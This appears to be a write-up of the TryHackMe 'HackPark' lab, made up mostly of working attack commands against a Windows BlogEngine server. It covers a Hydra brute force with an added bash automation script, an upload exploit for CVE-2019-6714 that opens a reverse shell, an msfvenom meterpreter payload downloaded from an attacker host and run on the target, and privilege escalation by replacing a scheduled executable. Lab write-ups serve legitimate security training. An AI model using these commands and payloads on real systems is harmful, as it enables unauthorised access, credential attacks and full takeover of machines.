THM - HackPark
Deploy the vulnerable Windows machine
- pennywise
Using Hydra to brute-force a login
gobuster dir --url http://10.10.117.53 -w directory-list-1.0.txt
http://10.10.117.53/admin
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.117.53 http-post-form "/Account/login.aspx:login=^USER^&password=^PASS^:F=failed"
This first attempt fails: the login is an ASP.NET WebForms page, so the POST must carry the page's __VIEWSTATE and __EVENTVALIDATION hidden fields and the real control names (ctl00$MainContent$LoginUser$UserName, ...Password, ...LoginButton). Capture them from the login page (browser dev tools or Burp) and build the full form string:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.117.53 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=bbKmJ9xxHdEFSouZb%2FJt114g7kbCU%2BaAQwAIi4deqUFdDc2%2BDOyfhbxPK%2B%2BNIs0jqf%2FsVfEDjsUlyqNHfV9qvtxjqKI%2Bxk0hB92SHyd%2FrMv8lSkz39MnOgI%2FZTUf8MkHtfySJo6nuN%2BfIreenhyC74kh2wscnkRKMUtwStKAYClr9zwW&__EVENTVALIDATION=HBnWUtjmHn9931oNnDtG22SHpD0NpHECaRk84HSrl2D8YcWVS9rjv5ZaHkUBaawrBI4SEK67XCSEm4PrceIrvncRurdqS7hnGAOprTQOqVT%2BCYiaQQdwX5Btmf1e3LIh%2BEAFsXzTN5jJFUTpssnZJ6jYywchAMPdrLGCkPjibCwERDvH&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=failed"
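Added example (not part of the original walkthrough): a bash script that fetches the login page, extracts __VIEWSTATE and __EVENTVALIDATION, and builds the hydra form string itself, so the tokens do not have to be pasted by hand. The login path, field names and the "failed" marker are taken from the command above; the function names, the brute_login wrapper and the SAMPLE_HTML are my own, and SAMPLE_HTML is constructed only for the offline check. If the application rotates the tokens per request, a static form string will not work and the brute force has to be done with a tool that re-fetches them each attempt.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up.
# Builds the hydra http-post-form spec for an ASP.NET WebForms login from the
# live login page instead of hand-pasting the hidden-field values.
set -eu

# Percent-encode the characters that appear in ASP.NET hidden-field values
# (base64 alphabet: + / =) so they survive inside the POST body.
urlencode_token() {
  printf '%s' "$1" | sed -e 's|%|%25|g' -e 's|+|%2B|g' -e 's|/|%2F|g' -e 's|=|%3D|g'
}

# Print the value attribute of the <input> whose name attribute is $1,
# reading the HTML from stdin. Fails loudly if the field is absent.
hidden_value() {
  local name="$1" tag
  tag=$(grep -o "<input[^>]*name=\"$name\"[^>]*>" || true)
  [ -n "$tag" ] || { echo "missing hidden field $name" >&2; return 1; }
  printf '%s\n' "$tag" | sed 's/.*value="\([^"]*\)".*/\1/'
}

# Compose hydra's spec: path:POST-body:failure-condition (same layout as the
# hand-built command on this page).
hydra_form() {
  local html="$1" vs ev
  vs=$(printf '%s' "$html" | hidden_value __VIEWSTATE)
  ev=$(printf '%s' "$html" | hidden_value __EVENTVALIDATION)
  printf '/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=%s&__EVENTVALIDATION=%s&ctl00%%24MainContent%%24LoginUser%%24UserName=^USER^&ctl00%%24MainContent%%24LoginUser%%24Password=^PASS^&ctl00%%24MainContent%%24LoginUser%%24LoginButton=Log+in:F=failed' \
    "$(urlencode_token "$vs")" "$(urlencode_token "$ev")"
}

# Fetch the tokens from the target and hand the finished spec to hydra.
# Usage: ./hydra_aspnet.sh 10.10.117.53 [user] [wordlist]
brute_login() {
  local target="$1" user="$2" wordlist="$3" html form
  html=$(curl -s "http://$target/Account/login.aspx?ReturnURL=/admin")
  form=$(hydra_form "$html")
  hydra -l "$user" -P "$wordlist" "$target" http-post-form "$form"
}

# Constructed sample of the relevant part of a WebForms login page (not captured
# from the target); used only to exercise the parsing offline.
SAMPLE_HTML='<form method="post" action="./login.aspx?ReturnURL=/admin" id="form1">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="abc/def+ghi==" />
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="xyz+123/==" />
<input name="ctl00$MainContent$LoginUser$UserName" type="text" id="MainContent_LoginUser_UserName" />
</form>'

if [ $# -ge 1 ]; then
  brute_login "$1" "${2:-admin}" "${3:-/usr/share/wordlists/rockyou.txt}"
fi
```

Run with the target IP as the first argument; with no arguments it only defines the functions. Keep the F= marker matched to the text the application actually returns on a bad login, otherwise every attempt is reported as a hit.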
Compromise the machine
Admin login
login: admin password: 1qaz2wsx
CMS Version
3.3.6.0
Exploit for that version
CVE-2019-6714
https://www.exploit-db.com/exploits/46353
Place where exploit can be uploaded
Edit the listener IP and port in the exploit, save it as PostView.ascx and upload it through the file manager on the edit-post page:
10.10.117.53/admin/app/editor/editpost.cshtml
Set up listener
nc -nvlp 4443
Trigger the reverse shell by loading the uploaded PostView.ascx through the theme path traversal
10.10.117.53/?theme=../../App_Data/files/
Get the shell
whoami
Windows Privilege Escalation
Generate a payload for a better (meterpreter) shell
hacker machine
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe
Serve shell.exe over HTTP from the attacker machine
hacker machine
python3 -m http.server
Run listener
msfconsole
msf6 > search multi handler
...
5 exploit/multi/handler
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
Fetch shell.exe on the target
target machine
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
target machine
cd C:\Windows\Temp
dir
.\shell.exe
target machine
shell
powershell -c "Invoke-WebRequest -Uri 'http://10.18.9.175:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
cd C:\Windows\Temp
dir
.\winPEAS.bat
target machine
meterpreter > cd "c:\Program Files (x86)\SystemScheduler"
meterpreter > cp Message.exe Message.exe.back
meterpreter > rm "c:\Program Files (x86)\SystemScheduler\Message.exe"
meterpreter > cd "c:\Windows\Temp"
meterpreter > cp shell.exe "c:\Program Files (x86)\SystemScheduler\Message.exe"
exit
run
Exiting the meterpreter session returns to the handler prompt; run the handler again and wait for the scheduler to execute the replaced Message.exe. It runs with administrative privileges, so the next callback is an Administrator-level shell (there is no "root" on Windows); confirm with whoami. Restore Message.exe.back when finished.